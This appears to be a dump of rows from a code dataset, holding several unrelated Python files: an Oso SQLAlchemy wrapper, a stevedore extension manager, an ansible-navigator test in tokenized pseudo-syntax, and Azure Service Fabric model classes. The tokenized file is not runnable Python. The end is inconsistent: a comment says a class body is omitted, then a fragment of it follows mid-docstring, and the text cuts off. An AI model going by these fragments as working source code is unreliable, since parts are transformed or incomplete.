content
stringlengths
0
1.55M
from oso import Oso

from .auth import register_models


class SQLAlchemyOso(Oso):
    """Oso engine pre-wired for SQLAlchemy.

    The central object to manage application policy state (e.g. the policy
    data) and verify requests when using Oso with SQLAlchemy.  Supports
    SQLAlchemy-specific functionality, including data filtering.

    Accepts a SQLAlchemy declarative_base on initialization, which is used to
    register all relevant SQLAlchemy models with Oso.

    >>> from sqlalchemy_oso import SQLAlchemyOso
    >>> from sqlalchemy.ext.declarative import declarative_base
    >>> Base = declarative_base(name="MyBaseModel")
    >>> SQLAlchemyOso(Base)
    <sqlalchemy_oso.oso.SQLAlchemyOso object at 0x...>
    """

    def __init__(self, sqlalchemy_base):
        super().__init__()

        # Make every model hanging off the declarative base known to the
        # policy engine before any policy file is loaded.
        register_models(self, sqlalchemy_base)

        # Keep a handle on the declarative base for later introspection.
        self.base = sqlalchemy_base
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import logging

from .extension import ExtensionManager

LOG = logging.getLogger(__name__)


class EnabledExtensionManager(ExtensionManager):
    """Loads only plugins that pass a check function.

    The check_func argument should return a boolean, with ``True``
    indicating that the extension should be loaded and made available and
    ``False`` indicating that the extension should be ignored.

    :param namespace: The namespace for the entry points.
    :type namespace: str
    :param check_func: Function to determine which extensions to load.
    :type check_func: callable, taking an :class:`Extension` instance as
        argument
    :param invoke_on_load: Boolean controlling whether to invoke the
        object returned by the entry point after the driver is loaded.
    :type invoke_on_load: bool
    :param invoke_args: Positional arguments to pass when invoking
        the object returned by the entry point. Only used if invoke_on_load
        is True.
    :type invoke_args: tuple
    :param invoke_kwds: Named arguments to pass when invoking
        the object returned by the entry point. Only used if invoke_on_load
        is True.
    :type invoke_kwds: dict
    :param propagate_map_exceptions: Boolean controlling whether exceptions
        are propagated up through the map call or whether they are logged and
        then ignored
    :type propagate_map_exceptions: bool
    :param on_load_failure_callback: Callback function that will be called when
        an entrypoint can not be loaded. The arguments that will be provided
        when this is called (when an entrypoint fails to load) are
        (manager, entrypoint, exception)
    :type on_load_failure_callback: function
    :param verify_requirements: Use setuptools to enforce the
        dependencies of the plugin(s) being loaded. Defaults to False.
    :type verify_requirements: bool
    """

    def __init__(self, namespace, check_func, invoke_on_load=False,
                 invoke_args=(), invoke_kwds=None,
                 propagate_map_exceptions=False,
                 on_load_failure_callback=None,
                 verify_requirements=False,
                 ):
        self.check_func = check_func
        # FIX: invoke_kwds previously defaulted to a shared mutable dict
        # ({}), which every call (and the parent class) could mutate and
        # leak between managers.  Use None as the sentinel and build a
        # fresh dict per call; callers that passed a dict are unaffected.
        if invoke_kwds is None:
            invoke_kwds = {}
        super(EnabledExtensionManager, self).__init__(
            namespace,
            invoke_on_load=invoke_on_load,
            invoke_args=invoke_args,
            invoke_kwds=invoke_kwds,
            propagate_map_exceptions=propagate_map_exceptions,
            on_load_failure_callback=on_load_failure_callback,
            verify_requirements=verify_requirements,
        )

    def _load_one_plugin(self, ep, invoke_on_load, invoke_args, invoke_kwds,
                         verify_requirements):
        """Load one entry point, then discard it if check_func rejects it.

        Returns the loaded extension, or None when check_func vetoes it.
        """
        ext = super(EnabledExtensionManager, self)._load_one_plugin(
            ep, invoke_on_load, invoke_args, invoke_kwds,
            verify_requirements,
        )
        if ext and not self.check_func(ext):
            # Veto from the filter: log at debug so operators can see why
            # an installed plugin is not being offered.
            LOG.debug('ignoring extension %r', ep.name)
            return None
        return ext
"""Base class for run interactive/stdout tests. """<import_stmt>difflib<import_stmt>json<import_stmt>os<import_from_stmt>typing Optional<import_stmt>pytest<import_from_stmt>..._interactions SearchFor<import_from_stmt>..._interactions Step<import_from_stmt>....defaults FIXTURES_DIR<import_from_stmt>..._common fixture_path_from_request<import_from_stmt>..._common update_fixtures<import_from_stmt>..._tmux_session TmuxSession<line_sep># run playbook run_fixture_dir=os.path.join(FIXTURES_DIR "integration" "actions" "run")<line_sep>inventory_path=os.path.join(run_fixture_dir "inventory")<line_sep>playbook_path=os.path.join(run_fixture_dir "site.yaml")<line_sep>base_steps=(Step(user_input=":0" comment="play-1 details") Step(user_input=":0" comment="task-1 details") Step(user_input=":back" comment="play-1 details") Step(user_input=":1" comment="play-1 task-2 details") Step(user_input=":back" comment="play-1 details") Step(user_input=":back" comment="all play details") Step(user_input=":1" comment="play-2 details") Step(user_input=":0" comment="play-2 task-1 details") Step(user_input=":back" comment="play-2 details") Step(user_input=":1" comment="play-2 task-2 details") Step(user_input=":back" comment="play-2 details") Step(user_input=":back" comment="all play details") Step(user_input=":st" comment="display stream") )<class_stmt>BaseClass<block_start>"""Base class for run interactive/stdout tests."""<line_sep>UPDATE_FIXTURES=<false><line_sep>TEST_FOR_MODE:Optional[str]=<none><line_sep>@staticmethod@pytest.fixture(scope="module" name="tmux_session")<def_stmt>fixture_tmux_session request<block_start>"""tmux fixture for this module"""<line_sep>params={"pane_height":"1000" "pane_width":"500" "setup_commands":["export ANSIBLE_DEVEL_WARNING=False" "export ANSIBLE_DEPRECATION_WARNINGS=False" ] "unique_test_id":request.node.nodeid }<with_stmt>TmuxSession(**params)<as>tmux_session<block_start><yield>tmux_session<block_end><block_end><def_stmt>test self request tmux_session step# 
pylint: disable=too-many-branches # pylint: disable=too-many-locals <block_start>"""Run the tests for run, mode and ``ee`` set in child class."""<if_stmt>step.search_within_response<is>SearchFor.HELP<block_start>search_within_response=":help help"<block_end><elif_stmt>step.search_within_response<is>SearchFor.PROMPT<block_start>search_within_response=tmux_session.cli_prompt<block_end><else_stmt><block_start>search_within_response=step.search_within_response<block_end>received_output=tmux_session.interaction(value=step.user_input search_within_response=search_within_response )<if_stmt>step.mask# mask out some configuration that is subject to change each run <block_start>mask="X"<times>50<for_stmt>idx,line enumerate(received_output)<block_start><if_stmt>tmux_session.cli_prompt<in>line<block_start>received_output[idx]=mask<block_end><else_stmt><block_start><for_stmt>out ["duration:" "playbook:" "start:" "end:" "task_path:"]<block_start><if_stmt>out<in>line<block_start>received_output[idx]=mask<block_end><block_end><block_end><block_end><block_end>fixtures_update_requested=(self.UPDATE_FIXTURES<or>os.environ.get("ANSIBLE_NAVIGATOR_UPDATE_TEST_FIXTURES")<eq>"true"<and><not>any((step.look_fors step.look_nots)))<if_stmt>fixtures_update_requested<block_start>update_fixtures(request step.step_index received_output step.comment additional_information={"look_fors":step.look_fors "look_nots":step.look_nots "compared_fixture":<not>any((step.look_fors step.look_nots)) } )<block_end>page=" ".join(received_output)<if_stmt>step.look_fors<block_start><assert_stmt>all(look_for<in>page<for>look_for step.look_fors)<block_end><if_stmt>step.look_nots<block_start><assert_stmt><not>any(look_not<in>page<for>look_not step.look_nots)<block_end><if_stmt><not>any((step.look_fors step.look_nots))<block_start>dir_path,file_name=fixture_path_from_request(request step.step_index)<with_stmt>open(file=os.path.join(dir_path file_name) 
encoding="utf-8")<as>infile<block_start>expected_output=json.load(infile)["output"]<block_end><assert_stmt>expected_output<eq>received_output "\n"+"\n".join(difflib.unified_diff(expected_output received_output "expected" "received"))<block_end><block_end><block_end>
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------

from azure.core.exceptions import HttpResponseError
import msrest.serialization


class ApplicationDeltaHealthPolicy(msrest.serialization.Model):
    """Defines a delta health policy used to evaluate the health of an application or one of its
    child entities when upgrading the cluster.

    :param default_service_type_delta_health_policy: The delta health policy used by default to
     evaluate the health of a service type when upgrading the cluster.
    :type default_service_type_delta_health_policy:
     ~azure.mgmt.servicefabric.models.ServiceTypeDeltaHealthPolicy
    :param service_type_delta_health_policies: The map with service type delta health policy per
     service type name. The map is empty by default.
    :type service_type_delta_health_policies: dict[str,
     ~azure.mgmt.servicefabric.models.ServiceTypeDeltaHealthPolicy]
    """

    _attribute_map = {
        'default_service_type_delta_health_policy': {'key': 'defaultServiceTypeDeltaHealthPolicy', 'type': 'ServiceTypeDeltaHealthPolicy'},
        'service_type_delta_health_policies': {'key': 'serviceTypeDeltaHealthPolicies', 'type': '{ServiceTypeDeltaHealthPolicy}'},
    }

    def __init__(self, **kwargs):
        super(ApplicationDeltaHealthPolicy, self).__init__(**kwargs)
        self.default_service_type_delta_health_policy = kwargs.get('default_service_type_delta_health_policy', None)
        self.service_type_delta_health_policies = kwargs.get('service_type_delta_health_policies', None)


class ApplicationHealthPolicy(msrest.serialization.Model):
    """Defines a health policy used to evaluate the health of an application or one of its children
    entities.

    :param default_service_type_health_policy: The health policy used by default to evaluate the
     health of a service type.
    :type default_service_type_health_policy:
     ~azure.mgmt.servicefabric.models.ServiceTypeHealthPolicy
    :param service_type_health_policies: The map with service type health policy per service type
     name. The map is empty by default.
    :type service_type_health_policies: dict[str,
     ~azure.mgmt.servicefabric.models.ServiceTypeHealthPolicy]
    """

    _attribute_map = {
        'default_service_type_health_policy': {'key': 'defaultServiceTypeHealthPolicy', 'type': 'ServiceTypeHealthPolicy'},
        'service_type_health_policies': {'key': 'serviceTypeHealthPolicies', 'type': '{ServiceTypeHealthPolicy}'},
    }

    def __init__(self, **kwargs):
        super(ApplicationHealthPolicy, self).__init__(**kwargs)
        self.default_service_type_health_policy = kwargs.get('default_service_type_health_policy', None)
        self.service_type_health_policies = kwargs.get('service_type_health_policies', None)


class ApplicationMetricDescription(msrest.serialization.Model):
    """Describes capacity information for a custom resource balancing metric. This can be used to
    limit the total consumption of this metric by the services of this application.

    :param name: The name of the metric.
    :type name: str
    :param maximum_capacity: The maximum node capacity for Service Fabric application.  This is the
     maximum Load for an instance of this application on a single node. Even if the capacity of
     node is greater than this value, Service Fabric will limit the total load of services within
     the application on each node to this value.  If set to zero, capacity for this metric is
     unlimited on each node.  The product of MaximumNodes and this value must always be smaller
     than or equal to TotalApplicationCapacity.
    :type maximum_capacity: long
    :param reservation_capacity: The node reservation capacity for Service Fabric application.
     This is the amount of load which is reserved on nodes which have instances of this
     application.  If MinimumNodes is specified, then the product of these values will be the
     capacity reserved in the cluster for the application.  If set to zero, no capacity is reserved
     for this metric.  This value must be smaller than or equal to MaximumCapacity for each metric.
    :type reservation_capacity: long
    :param total_application_capacity: The total metric capacity for Service Fabric application.
     This is the total metric capacity for this application in the cluster.  The product of
     MaximumNodes and MaximumCapacity must always be smaller than or equal to this value.
    :type total_application_capacity: long
    """

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'maximum_capacity': {'key': 'maximumCapacity', 'type': 'long'},
        'reservation_capacity': {'key': 'reservationCapacity', 'type': 'long'},
        'total_application_capacity': {'key': 'totalApplicationCapacity', 'type': 'long'},
    }

    def __init__(self, **kwargs):
        super(ApplicationMetricDescription, self).__init__(**kwargs)
        self.name = kwargs.get('name', None)
        self.maximum_capacity = kwargs.get('maximum_capacity', None)
        self.reservation_capacity = kwargs.get('reservation_capacity', None)
        self.total_application_capacity = kwargs.get('total_application_capacity', None)


class ProxyResource(msrest.serialization.Model):
    """The resource model definition for proxy-only resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource identifier.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param location: It will be deprecated in New API, resource location depends on the parent
     resource.
    :type location: str
    :param tags: A set of tags. Azure resource tags.
    :type tags: dict[str, str]
    :ivar etag: Azure resource etag.
    :vartype etag: str
    :ivar system_data: Metadata pertaining to creation and last modification of the resource.
    :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'etag': {'readonly': True},
        'system_data': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'etag': {'key': 'etag', 'type': 'str'},
        'system_data': {'key': 'systemData', 'type': 'SystemData'},
    }

    def __init__(self, **kwargs):
        super(ProxyResource, self).__init__(**kwargs)
        # Server-populated (readonly) fields are initialized to None.
        self.id = None
        self.name = None
        self.type = None
        self.location = kwargs.get('location', None)
        self.tags = kwargs.get('tags', None)
        self.etag = None
        self.system_data = None


class ApplicationResource(ProxyResource):
    """The application resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource identifier.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param location: It will be deprecated in New API, resource location depends on the parent
     resource.
    :type location: str
    :param tags: A set of tags. Azure resource tags.
    :type tags: dict[str, str]
    :ivar etag: Azure resource etag.
    :vartype etag: str
    :ivar system_data: Metadata pertaining to creation and last modification of the resource.
    :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData
    :param identity: Describes the managed identities for an Azure resource.
    :type identity: ~azure.mgmt.servicefabric.models.ManagedIdentity
    :param type_version: The version of the application type as defined in the application
     manifest.
    :type type_version: str
    :param parameters: List of application parameters with overridden values from their default
     values specified in the application manifest.
    :type parameters: dict[str, str]
    :param upgrade_policy: Describes the policy for a monitored application upgrade.
    :type upgrade_policy: ~azure.mgmt.servicefabric.models.ApplicationUpgradePolicy
    :param minimum_nodes: The minimum number of nodes where Service Fabric will reserve capacity
     for this application. If this property is set to zero, no capacity will be reserved. Cannot
     be more than the value of the MaximumNodes property.
    :type minimum_nodes: long
    :param maximum_nodes: The maximum number of nodes where Service Fabric will reserve capacity
     for this application. By default, the value of this property is zero and it means that the
     services can be placed on any node.
    :type maximum_nodes: long
    :param remove_application_capacity: Remove the current application capacity settings.
    :type remove_application_capacity: bool
    :param metrics: List of application capacity metric description.
    :type metrics: list[~azure.mgmt.servicefabric.models.ApplicationMetricDescription]
    :param managed_identities: List of user assigned identities for the application, each mapped
     to a friendly name.
    :type managed_identities:
     list[~azure.mgmt.servicefabric.models.ApplicationUserAssignedIdentity]
    :ivar provisioning_state: The current deployment or provisioning state, which only appears in
     the response.
    :vartype provisioning_state: str
    :param type_name: The application type name as defined in the application manifest.
    :type type_name: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'etag': {'readonly': True},
        'system_data': {'readonly': True},
        'minimum_nodes': {'minimum': 0},
        'maximum_nodes': {'minimum': 0},
        'provisioning_state': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'etag': {'key': 'etag', 'type': 'str'},
        'system_data': {'key': 'systemData', 'type': 'SystemData'},
        'identity': {'key': 'identity', 'type': 'ManagedIdentity'},
        'type_version': {'key': 'properties.typeVersion', 'type': 'str'},
        'parameters': {'key': 'properties.parameters', 'type': '{str}'},
        'upgrade_policy': {'key': 'properties.upgradePolicy', 'type': 'ApplicationUpgradePolicy'},
        'minimum_nodes': {'key': 'properties.minimumNodes', 'type': 'long'},
        'maximum_nodes': {'key': 'properties.maximumNodes', 'type': 'long'},
        'remove_application_capacity': {'key': 'properties.removeApplicationCapacity', 'type': 'bool'},
        'metrics': {'key': 'properties.metrics', 'type': '[ApplicationMetricDescription]'},
        'managed_identities': {'key': 'properties.managedIdentities', 'type': '[ApplicationUserAssignedIdentity]'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'type_name': {'key': 'properties.typeName', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationResource, self).__init__(**kwargs)
        self.identity = kwargs.get('identity', None)
        self.type_version = kwargs.get('type_version', None)
        self.parameters = kwargs.get('parameters', None)
        self.upgrade_policy = kwargs.get('upgrade_policy', None)
        self.minimum_nodes = kwargs.get('minimum_nodes', None)
        # NOTE(review): unlike the other optionals, maximum_nodes defaults to
        # 0 (not None) in the original generated code — preserved as-is.
        self.maximum_nodes = kwargs.get('maximum_nodes', 0)
        self.remove_application_capacity = kwargs.get('remove_application_capacity', None)
        self.metrics = kwargs.get('metrics', None)
        self.managed_identities = kwargs.get('managed_identities', None)
        self.provisioning_state = None
        self.type_name = kwargs.get('type_name', None)


class ApplicationResourceList(msrest.serialization.Model):
    """The list of application resources.

    Variables are only populated by the server, and will be ignored when sending a request.

    :param value:
    :type value: list[~azure.mgmt.servicefabric.models.ApplicationResource]
    :ivar next_link: URL to get the next set of application list results if there are any.
    :vartype next_link: str
    """

    _validation = {
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[ApplicationResource]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationResourceList, self).__init__(**kwargs)
        self.value = kwargs.get('value', None)
        self.next_link = None


class ApplicationResourceUpdateProperties(msrest.serialization.Model):
    """The application resource properties for patch operations.

    :param type_version: The version of the application type as defined in the application
     manifest.
    :type type_version: str
    :param parameters: List of application parameters with overridden values from their default
     values specified in the application manifest.
    :type parameters: dict[str, str]
    :param upgrade_policy: Describes the policy for a monitored application upgrade.
    :type upgrade_policy: ~azure.mgmt.servicefabric.models.ApplicationUpgradePolicy
    :param minimum_nodes: The minimum number of nodes where Service Fabric will reserve capacity
     for this application. If this property is set to zero, no capacity will be reserved. Cannot
     be more than the value of the MaximumNodes property.
    :type minimum_nodes: long
    :param maximum_nodes: The maximum number of nodes where Service Fabric will reserve capacity
     for this application. By default, the value of this property is zero and it means that the
     services can be placed on any node.
    :type maximum_nodes: long
    :param remove_application_capacity: Remove the current application capacity settings.
    :type remove_application_capacity: bool
    :param metrics: List of application capacity metric description.
    :type metrics: list[~azure.mgmt.servicefabric.models.ApplicationMetricDescription]
    :param managed_identities: List of user assigned identities for the application, each mapped
     to a friendly name.
    :type managed_identities:
     list[~azure.mgmt.servicefabric.models.ApplicationUserAssignedIdentity]
    """

    _validation = {
        'minimum_nodes': {'minimum': 0},
        'maximum_nodes': {'minimum': 0},
    }

    _attribute_map = {
        'type_version': {'key': 'typeVersion', 'type': 'str'},
        'parameters': {'key': 'parameters', 'type': '{str}'},
        'upgrade_policy': {'key': 'upgradePolicy', 'type': 'ApplicationUpgradePolicy'},
        'minimum_nodes': {'key': 'minimumNodes', 'type': 'long'},
        'maximum_nodes': {'key': 'maximumNodes', 'type': 'long'},
        'remove_application_capacity': {'key': 'removeApplicationCapacity', 'type': 'bool'},
        'metrics': {'key': 'metrics', 'type': '[ApplicationMetricDescription]'},
        'managed_identities': {'key': 'managedIdentities', 'type': '[ApplicationUserAssignedIdentity]'},
    }

    def __init__(self, **kwargs):
        super(ApplicationResourceUpdateProperties, self).__init__(**kwargs)
        self.type_version = kwargs.get('type_version', None)
        self.parameters = kwargs.get('parameters', None)
        self.upgrade_policy = kwargs.get('upgrade_policy', None)
        self.minimum_nodes = kwargs.get('minimum_nodes', None)
        # maximum_nodes defaults to 0 per the generated original (not None).
        self.maximum_nodes = kwargs.get('maximum_nodes', 0)
        self.remove_application_capacity = kwargs.get('remove_application_capacity', None)
        self.metrics = kwargs.get('metrics', None)
        self.managed_identities = kwargs.get('managed_identities', None)


class ApplicationResourceProperties(ApplicationResourceUpdateProperties):
    """The application resource properties.

    Variables are only populated by the server, and will be ignored when sending a request.

    All patch-time parameters are inherited from
    ApplicationResourceUpdateProperties; this subclass adds the readonly
    provisioning state and the application type name.

    :ivar provisioning_state: The current deployment or provisioning state, which only appears in
     the response.
    :vartype provisioning_state: str
    :param type_name: The application type name as defined in the application manifest.
    :type type_name: str
    """

    _validation = {
        'minimum_nodes': {'minimum': 0},
        'maximum_nodes': {'minimum': 0},
        'provisioning_state': {'readonly': True},
    }

    _attribute_map = {
        'type_version': {'key': 'typeVersion', 'type': 'str'},
        'parameters': {'key': 'parameters', 'type': '{str}'},
        'upgrade_policy': {'key': 'upgradePolicy', 'type': 'ApplicationUpgradePolicy'},
        'minimum_nodes': {'key': 'minimumNodes', 'type': 'long'},
        'maximum_nodes': {'key': 'maximumNodes', 'type': 'long'},
        'remove_application_capacity': {'key': 'removeApplicationCapacity', 'type': 'bool'},
        'metrics': {'key': 'metrics', 'type': '[ApplicationMetricDescription]'},
        'managed_identities': {'key': 'managedIdentities', 'type': '[ApplicationUserAssignedIdentity]'},
        'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
        'type_name': {'key': 'typeName', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationResourceProperties, self).__init__(**kwargs)
        self.provisioning_state = None
        self.type_name = kwargs.get('type_name', None)


class ApplicationResourceUpdate(ProxyResource):
    """The application resource for patch operations.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource identifier.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param location: It will be deprecated in New API, resource location depends on the parent
     resource.
    :type location: str
    :param tags: A set of tags. Azure resource tags.
    :type tags: dict[str, str]
    :ivar etag: Azure resource etag.
    :vartype etag: str
    :ivar system_data: Metadata pertaining to creation and last modification of the resource.
    :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData
    :param type_version: The version of the application type as defined in the application
     manifest.
    :type type_version: str
    :param parameters: List of application parameters with overridden values from their default
     values specified in the application manifest.
    :type parameters: dict[str, str]
    :param upgrade_policy: Describes the policy for a monitored application upgrade.
    :type upgrade_policy: ~azure.mgmt.servicefabric.models.ApplicationUpgradePolicy
    :param minimum_nodes: The minimum number of nodes where Service Fabric will reserve capacity
     for this application. If this property is set to zero, no capacity will be reserved. Cannot
     be more than the value of the MaximumNodes property.
    :type minimum_nodes: long
    :param maximum_nodes: The maximum number of nodes where Service Fabric will reserve capacity
     for this application. By default, the value of this property is zero and it means that the
     services can be placed on any node.
    :type maximum_nodes: long
    :param remove_application_capacity: Remove the current application capacity settings.
    :type remove_application_capacity: bool
    :param metrics: List of application capacity metric description.
    :type metrics: list[~azure.mgmt.servicefabric.models.ApplicationMetricDescription]
    :param managed_identities: List of user assigned identities for the application, each mapped
     to a friendly name.
    :type managed_identities:
     list[~azure.mgmt.servicefabric.models.ApplicationUserAssignedIdentity]
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'etag': {'readonly': True},
        'system_data': {'readonly': True},
        'minimum_nodes': {'minimum': 0},
        'maximum_nodes': {'minimum': 0},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'etag': {'key': 'etag', 'type': 'str'},
        'system_data': {'key': 'systemData', 'type': 'SystemData'},
        'type_version': {'key': 'properties.typeVersion', 'type': 'str'},
        'parameters': {'key': 'properties.parameters', 'type': '{str}'},
        'upgrade_policy': {'key': 'properties.upgradePolicy', 'type': 'ApplicationUpgradePolicy'},
        'minimum_nodes': {'key': 'properties.minimumNodes', 'type': 'long'},
        'maximum_nodes': {'key': 'properties.maximumNodes', 'type': 'long'},
        'remove_application_capacity': {'key': 'properties.removeApplicationCapacity', 'type': 'bool'},
        'metrics': {'key': 'properties.metrics', 'type': '[ApplicationMetricDescription]'},
        'managed_identities': {'key': 'properties.managedIdentities', 'type': '[ApplicationUserAssignedIdentity]'},
    }

    def __init__(self, **kwargs):
        super(ApplicationResourceUpdate, self).__init__(**kwargs)
        self.type_version = kwargs.get('type_version', None)
        self.parameters = kwargs.get('parameters', None)
        self.upgrade_policy = kwargs.get('upgrade_policy', None)
        self.minimum_nodes = kwargs.get('minimum_nodes', None)
        # maximum_nodes defaults to 0 per the generated original (not None).
        self.maximum_nodes = kwargs.get('maximum_nodes', 0)
        self.remove_application_capacity = kwargs.get('remove_application_capacity', None)
        self.metrics = kwargs.get('metrics', None)
        self.managed_identities = kwargs.get('managed_identities', None)


class ApplicationTypeResource(ProxyResource):
    """The application type name resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource identifier.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param location: It will be deprecated in New API, resource location depends on the parent
     resource.
    :type location: str
    :param tags: A set of tags. Azure resource tags.
    :type tags: dict[str, str]
    :ivar etag: Azure resource etag.
    :vartype etag: str
    :ivar system_data: Metadata pertaining to creation and last modification of the resource.
    :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData
    :ivar provisioning_state: The current deployment or provisioning state, which only appears in
     the response.
    :vartype provisioning_state: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'etag': {'readonly': True},
        'system_data': {'readonly': True},
        'provisioning_state': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'etag': {'key': 'etag', 'type': 'str'},
        'system_data': {'key': 'systemData', 'type': 'SystemData'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationTypeResource, self).__init__(**kwargs)
        self.provisioning_state = None


class ApplicationTypeResourceList(msrest.serialization.Model):
    """The list of application type names.

    Variables are only populated by the server, and will be ignored when sending a request.

    :param value:
    :type value: list[~azure.mgmt.servicefabric.models.ApplicationTypeResource]
    :ivar next_link: URL to get the next set of application type list results if there are any.
    :vartype next_link: str
    """

    _validation = {
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[ApplicationTypeResource]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationTypeResourceList, self).__init__(**kwargs)
        self.value = kwargs.get('value', None)
        self.next_link = None


# NOTE(review): the original source continues with
# ``class ApplicationTypeVersionResource(ProxyResource)`` (documented params
# include provisioning_state, app_package_url, default_parameter_list), but the
# definition is truncated at this chunk boundary.  Its body is not reproduced
# here to avoid guessing at unseen code — restore it from the full file.
:vartype default_parameter_list: dict[str, str] """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'provisioning_state':{'readonly':<true>} 'default_parameter_list':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} 'app_package_url':{'key':'properties.appPackageUrl' 'type':'str'} 'default_parameter_list':{'key':'properties.defaultParameterList' 'type':'{str}'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeVersionResource self).__init__(**kwargs)<line_sep>self.provisioning_state=<none><line_sep>self.app_package_url=kwargs.get('app_package_url' <none>)<line_sep>self.default_parameter_list=<none><block_end><block_end><class_stmt>ApplicationTypeVersionResourceList(msrest.serialization.Model)<block_start>"""The list of application type version resources for the specified application type name resource. Variables are only populated by the server, and will be ignored when sending a request. :param value: :type value: list[~azure.mgmt.servicefabric.models.ApplicationTypeVersionResource] :ivar next_link: URL to get the next set of application type version list results if there are any. 
:vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ApplicationTypeVersionResource]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeVersionResourceList self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>ApplicationTypeVersionsCleanupPolicy(msrest.serialization.Model)<block_start>"""ApplicationTypeVersionsCleanupPolicy. All required parameters must be populated in order to send to Azure. :param max_unused_versions_to_keep: Required. Number of unused versions per application type to keep. :type max_unused_versions_to_keep: long """<line_sep>_validation={'max_unused_versions_to_keep':{'required':<true> 'minimum':0} }<line_sep>_attribute_map={'max_unused_versions_to_keep':{'key':'maxUnusedVersionsToKeep' 'type':'long'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeVersionsCleanupPolicy self).__init__(**kwargs)<line_sep>self.max_unused_versions_to_keep=kwargs['max_unused_versions_to_keep']<block_end><block_end><class_stmt>ApplicationUpgradePolicy(msrest.serialization.Model)<block_start>"""Describes the policy for a monitored application upgrade. :param upgrade_replica_set_check_timeout: The maximum amount of time to block processing of an upgrade domain and prevent loss of availability when there are unexpected issues. When this timeout expires, processing of the upgrade domain will proceed regardless of availability loss issues. The timeout is reset at the start of each upgrade domain. Valid values are between 0 and 42949672925 inclusive. (unsigned 32-bit integer). :type upgrade_replica_set_check_timeout: str :param force_restart: If true, then processes are forcefully restarted during upgrade even when the code version has not changed (the upgrade only changes configuration or data). 
